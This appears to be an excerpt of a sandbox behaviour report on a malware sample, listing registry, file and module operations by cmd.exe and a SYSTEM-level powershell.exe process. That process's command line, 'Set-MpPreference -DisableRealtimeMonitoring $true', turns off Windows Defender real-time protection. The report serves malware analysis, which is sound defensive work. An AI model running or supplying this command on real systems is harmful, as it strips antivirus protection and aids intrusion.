Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\sc.exe, os_pid = 0x8a0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000424	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #28: powershell.exe

826

Information	Value
ID	#28
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:24, Reason: Child Process
Unmonitor	End Time: 00:01:32, Reason: Self Terminated
Monitor Duration	00:00:07

OS Process Information

Information	Value
PID	0x3ac
Parent PID	0x22c (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x 78C 0x 9B0 0x 9AC 0x 668 0x 9CC 0x 9D4 0x 9E0 0x 95C

Threads

Thread 0x78c

602

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	12	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096	17	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096	62	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096	21	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
